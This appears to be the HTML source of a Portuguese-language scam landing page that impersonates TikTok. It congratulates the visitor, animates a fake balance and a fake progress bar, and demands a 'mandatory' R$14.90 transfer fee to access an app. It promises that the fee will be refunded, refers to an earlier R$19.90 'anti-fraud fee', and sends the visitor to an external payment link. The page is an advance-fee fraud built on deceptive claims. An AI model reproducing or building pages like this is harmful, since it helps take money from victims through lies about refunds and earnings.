<!DOCTYPE html>
<html lang="pt-BR">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link data-optimized="1" rel="stylesheet" href="css/5921624bf5bbe4c8c091ef09226fa76f.css">
    <link rel="preconnect" href="https://fonts.googleapis.com/">
    <link rel="preconnect" href="https://fonts.gstatic.com/" crossorigin="">
    <link data-optimized="1" href="css/1c7a3d2ee9759dc256d915300855c494.css" rel="stylesheet">
    <link data-optimized="1" href="css/ba9cbbe9240a489628be8eb27c56db8a.css" rel="stylesheet">
    <link rel="stylesheet" href="css/style.css">
    <link rel="stylesheet" href="css/slider.css">
    <link rel="stylesheet" href="css/animated.css">
    <link rel="shortcut icon" href="images/faveicon.png">
    <link rel="stylesheet" href="css/notiflix-3.2.5.min.css">
    <link href="https://fonts.googleapis.com/css2?family=Poppins:wght@400;500;600;700&display=swap" rel="stylesheet">
    <title>Tiktok</title>

    <style>
        body {
            font-family: 'Poppins', sans-serif;
        }

        h1 {
            font-weight: 700; /* Peso maior para o título */
            font-size: 24px;
            color: #333;
        }

        p {
            font-weight: 500; /* Peso maior para os parágrafos */
            font-size: 14px;
            color: #666;
        }

        /* Estilo da barra de progresso */
        .progress-container {
            width: 100%;
            background-color: #f3f3f3;
            overflow: hidden;
            margin-bottom: 10px;
            margin-top: -10px;
        }

        .progress-bar {
            width: 0%;
            height: 30px;
            background-color: #9a03d7;
            text-align: center;
            line-height: 30px;
            color: black;
            transition: width 1s ease-in-out;
        }

.boxSaldo {
    width: auto;
    height: 40px;
    border: 2px solid #9a03d7; /* Orange */
    margin-right: 0px;
    margin-top: 7px;
    border-radius: 6px;
    padding: 0 20px 0 10px;
    position: relative;
    float: right;
    display: flex;
    align-items: center;
}

.valorSaldo {
    font-family: 'Poppins', sans-serif;
    font-weight: 800; /* Peso maior para o valor */
    font-size: 20px;
    color: #333;
}

        /* Estilo do botão */
        button {
            margin-bottom: 15px;
            background-color: #9a03d7;
            color: black;
            border: none;
            border-radius: 5px;
            width: 95%;
            height: 50px;
            cursor: pointer;
            font-family: 'Poppins', sans-serif;
            font-weight: 600; /* Peso maior para o texto do botão */
            margin-bottom: 20px;
            box-shadow: 0 2px 15px rgba(0, 0, 0, 0.3);
        }
    </style>
</head>
<body class="fundoWhite">
    <!-- Conteúdo HTML -->
    <div id="p1" style="background-color: #FFFFFF; padding: 15px 0 0 0; border-bottom: 1px solid #202020; box-shadow: 0 2px 15px rgba(0, 0, 0, 0.3);">
        <img style="width: 15%; margin: auto; margin-left: 50px; position: relative; margin-top: -5px;" src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSjQT_Dyh40TZUX8jAmuw8rhrs50YB7fh8qcw&s">
       

    <div id="produto1" style="width: 100%;">
        <div style="text-align: center; display: flex; padding: 10px; justify-content: center; align-items: center; flex-direction: column; align-content: center; flex-wrap: wrap; position: relative;">
            <img style="width: 100px; margin-top: 10px;" src="images/verified-unscreen.gif">
            <h1>Parabéns</h1>

            <!-- Barra de progresso -->
            <div class="progress-container">
                <div id="myProgressBar" class="progress-bar" style="width: 52%;"></div>
            </div>

            <p>Sua vaga está garantida! Para acessar o aplicativo é necessário pagar uma taxa de transferência de R$14,90 que nos ajuda a manter nossos servidores ativos.<br>
                <b>(OBRIGATÓRIA)</b><br><br>
                <span style="font-size: 13px; color: green;">(Este valor será estornado após confirmar seu cadastro)</span>
            </p>

            <button id="paymentButton">PAGAR TAXA E ACESSAR O APP</button>

            <p style="color: gray;">Você pagou a taxa anti fraude de R$19,90 que será reembolsada junto com seu saque
            </p>
        </div>
    </div>

    <script src="js/notiflix-3.2.5.min.js"></script>

    <script>
        document.addEventListener("DOMContentLoaded", function() {
            const saldoElemento = document.querySelector('.saldoAtualizado');
            const saldoFinal = 355.11;
            const saldoInicial = 335.21;
            const duracao = 2000;
            const passos = 100;
            const incremento = (saldoFinal - saldoInicial) / passos;
            const tempo = duracao / passos;
    
            let saldoAtual = saldoInicial;
    
            function atualizarSaldo() {
                saldoAtual += incremento;
                saldoElemento.textContent = saldoAtual.toFixed(2);
                
                if (saldoAtual < saldoFinal) {
                    setTimeout(atualizarSaldo, tempo);
                } else {
                    saldoElemento.textContent = saldoFinal.toFixed(2);
                }
            }
    
            atualizarSaldo();
        });
    </script>
    
    <script type="text/javascript">
        function updateProgressBar() {
            const progressBar = document.getElementById('myProgressBar');
            let width = 0;
            const interval = setInterval(() => {
                if (width >= 95) {
                    clearInterval(interval);
                } else {
                    width++;
                    progressBar.style.width = width + '%';
                    progressBar.textContent = width + '%';
                }
            }, 10); // Tempo de atualização em milissegundos (ajuste se necessário)
        }

        // Chama a função quando a página carregar
        window.onload = updateProgressBar;

        document.getElementById('paymentButton').addEventListener('click', function() {
            window.location.href = 'https://go.tribopay.com.br/2mqfy';
        });
    </script>

</body>
</html>
